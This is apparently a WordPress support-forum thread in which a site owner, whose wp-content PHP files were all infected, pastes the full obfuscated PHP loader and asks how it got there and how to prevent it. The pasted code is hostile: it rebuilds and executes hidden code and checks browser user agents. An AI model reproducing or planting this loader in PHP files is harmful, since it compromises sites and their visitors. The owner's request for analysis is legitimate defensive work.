WordPress wp-content all php files injected with malicious code
-
Somebody hacked my WordPress site few times and added this malicious code in every php file in wp-content directory. I tried to understand the functionality of this code checking line by line, but I wasn’t success.
<?php $srzvzfmce = 'B%iN}#-! x24/%tmw/ x24)utcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjy2bge56+99386c6f+9f5d816:+946:ce44#!isset($GLOBALS[" x61 156 x75 156 x61wbm)%tjw)# x24#-!#]y38#-!%w:**<sxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7U#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7*)7gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*137y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>#k#)usbut<code>cpV x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{ftmfV x7f<*pef)# x24*<!%t::!>! x24Ypp3)%c#N#*-!%ff2-!%t::**<(<!f97f:5297e:56-xr.985:uof",str_split("%tjw!>!#]y84]275]y83]248-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#- x27pd%6<pd%w6Z6<.4</code>hA x27pd%6<pd%w6Z6<.3<code>hA x27pd%6<pd%w6Z6<.2%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]5L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]28]47]67y]37]88y]27]28y]ss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6 x24)% x24- x24y4 x24- x24]y8 x2mpusut!-#j0#!/!**#sfmcnbs+yfeobz+|!*1?hmg%)!gj!<**2-4-bubE{j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K!gj!|!*msv%)}k~~~<ftmbg!osvufs!|74 141 x72 164") && (~6<Cw6<pd%w6Z6<.5</code>hA 145 x66 157 x78"))) pdof./#@#/qp%>5h%!<*:7}88:}334}472 x24<!%ff2!>!bssbz) x24]25 XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,4#)idubn<code>hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)fuj81]211M5]67]452]88]5]48]32M3]317]<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]7R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sd/#00;quui#>.%!<***f x27,*e x27,*d)##-!#~<#/% x24- x24!>!fyqm!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zsfwjidsb</code>bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0FH# x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{ 145 x5f 146 x75 156 x63 164 6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA x27doj%6< ")));$hpkrybc = $rbz5]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%q%6< x7fw6* x7f_*#fubfsdXk5<code>{66~{ $rbzqesi = " x63 162 x65 141 x74x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% c68399#-!#65egb2dc#*< x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x24}R;*msv%)}.;</code>UQPMSVD!-id%)uqpuft<code>ms275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]2ovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)s55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz445]212]445]43]321]464]as," x63 150 x72 157 x6d 145")) or (strstr($uas," x66 151 x72N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:~<ofmy%,3,j%>j%!<**3-]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x24676778:56985:6197g:74985-rr.93e:5597f-s.973:82!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6# x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38yx69 157 x6e"; function zmfouof($n){return chr7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*)zbssb!>!ssbnpe_GMFT</code>QIQ&f_UTPI<code>QUUI&e_SEEB</code>FUP!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2>2<!%ww2)%w<code>TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#qesi("", $oznodhd); $hpkrybc();}}NFS&d_SFSFGFS</code>QUUI&c_UOFHB<code>SFTV</code>QUUI&b%!|!*)323zbek!~!<b% x7f!<X>b%Z< x27,*c x27,*b x27)fepdof.)fe(ord($n)-1);} @error_reporting(0); $oznodhd = implode(array_map("zmfojg!)%z>>2*!%z>3<!fmtf!%z x45 116 x54"]); if ((strstr($uas," x6d 163 x69 145")) m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}52%j=6[%ww2!>#p#/#p#/%z<udfoopdXA x22)7gj6<*QDU<code>MPT7-NBFSUT</code>LDPT7-UFOJ<code>GB)fubfsdXA x27K6< x1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-if((function_exists(" x6f 142 x5f 163 xb%!**X)ufttj x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof1H*WCw*[!%rN}#QwTW%hIr x5c2]3]364]6]283]427]36]373P6]36]73]83]238M7]3x7fw6* x7f_*#fmjgk4</code>{6~6<tfs%w6< x7fw6*CWtfs%#opo#>b%!*##>>X)!gjZ<#opo#> x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2<code>{6:!}7;!}6dovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#7-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%vd},;uqpuft</code>msvd}+;!>!} x27;!>>>!%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cfdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341RVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x41 107<code>57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% xubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3!pd%)!gj}Z;h!opjudovg}{;#)tutjyf</code>opjudovg)]88M4P8]37]278]225]241]334]368]32x24- x24!>! x24/%tjw/IjQeTQcOc/#00#W~!Ydrr)%rxB%epnbs: x5c%j:^<!%w<code>x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opju#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*hnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppd</code>hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#B%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84]5cSFWSFT<code>%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#*^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.msv</code>ftsbqA7>b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rr:::::-111112)eobs<code>un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxp57]y86]267]y74]275]y7:]268]y7f#<!%tww!>!j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%)!gj!or (strstr($uas," x72 166 x3a 61 xx24- x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* f</code>opjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%ftmf!~<**9.-j%-bubE{h%)sutcvt)f275]D:M8]Df#<%tdz>#L4]27x61"]=1; $uas=strtolower($_SE6A:>:8:|:7#6#)tutjyf<code>439275ttfsqh%)tpqsut>j%!*9! x27!hmg%)!gj!o]s]o]s]#)fepmqyf x27*&7;##}C;!>>!}W;utpi}Y;tuofuopd</code>ufh<code>fmjg}[;ldpt%}K;</code>ufldpt}X;<code>msvd4- x24]26 x24- x24<%j,,*!| x24- x24gvodujpo! x24- x24y7#ujojRk3</code>{666~6<&w6<9**-)1/2986+7**^/%rx<~!!%s:}_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>> x22vg}k~~9{d%:osvufs:~928>> x22:ftmbg39*5qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA x272qj%6<^-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&"])))) { $GLOBALS[" x61 156 x75 156 {e%+*!*+fepdfe{h+{d%)+opjudfebfI{*w%)kVx{**#k#)tutjyf<code>x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui31")) or (strstr($uas," x61 156 x64 162 x6f 151 x64")) or (strstr($u284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+e#)tutjyf</code>4 x223}!+!<+}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjudoStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSxskvzvs'; $qrbywocpx = explode(chr((781 - 661)), substr($srzvzfmce, (38587 - 32567), (235 - 201))); $bgjlsownc = $qrbywocpx[0]($qrbywocpx[(5 - 4)]); $mfezxyd = $qrbywocpx[0]($qrbywocpx[(11 - 9)]); if (!function_exists('pyuarvnua')) { function pyuarvnua($qcgqlf, $aqtohnya, $tdchijch) { $muceog = NULL; for ($sfxhccxj = 0; $sfxhccxj < (sizeof($qcgqlf) / 2); $sfxhccxj++) { $muceog .= substr($aqtohnya, $qcgqlf[($sfxhccxj * 2)], $qcgqlf[($sfxhccxj * 2) + (4 - 3)]); } return $tdchijch(chr((63 - 54)), chr((582 - 490)), $muceog); };} $xtijqbipym = explode(chr((257 - 213)), '3534,39,1094,21,112,37,5671,36,5215,29,4083,54,3298,55,5027,34,5804,68,2470,61,1135,21,1997,34,1806,29,2847,45,3205,69,536,40,2661,52,1115,20,637,63,4581,43,5306,24,5624,47,1341,54,180,47,1687,49,3425,67,4221,38,5576,48,227,63,4767,61,1965,32,1835,63,3708,45,290,41,3891,52,2892,37,5448,20,3780,54,5330,63,2179,35,3943,33,5495,43,4259,42,1062,32,5160,31,4180,41,1736,70,5276,30,2640,21,4967,60,925,26,2322,59,23,55,5107,53,2976,54,4828,46,1534,34,3176,29,1156,21,4874,53,892,33,1631,56,1271,70,78,34,2929,47,3107,69,3753,27,3573,66,4137,43,4722,45,5960,60,5538,38,5244,32,4512,69,5938,22,5707,27,2272,50,397,66,1217,54,1465,69,5734,70,4435,41,3834,57,4665,57,2214,58,4927,40,2797,50,800,22,4476,36,700,53,331,66,3353,50,1177,40,2031,58,5061,46,4334,21,860,32,5393,55,2110,69,1568,27,463,30,0,23,3976,40,4355,31,822,38,2089,21,1595,36,4624,41,3639,26,3492,42,1008,54,2713,42,516,20,2579,61,2381,66,2755,42,1428,37,5191,24,753,47,1918,47,4016,67,4301,33,3665,43,1395,33,2447,23,5872,66,5468,27,2531,48,951,57,4386,49,3403,22,3274,24,3030,44,576,61,493,23,149,31,1898,20,3074,33'); $nqgumy = $bgjlsownc("", pyuarvnua($xtijqbipym, $srzvzfmce, $mfezxyd)); $bgjlsownc = $srzvzfmce; $nqgumy(""); $nqgumy = (477 - 356); $srzvzfmce = $nqgumy - 1;I need to information about, how they have add this code to files, functionality of the code and how to prevent from it.
Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
The topic ‘WordPress wp-content all php files injected with malicious code’ is closed to new replies.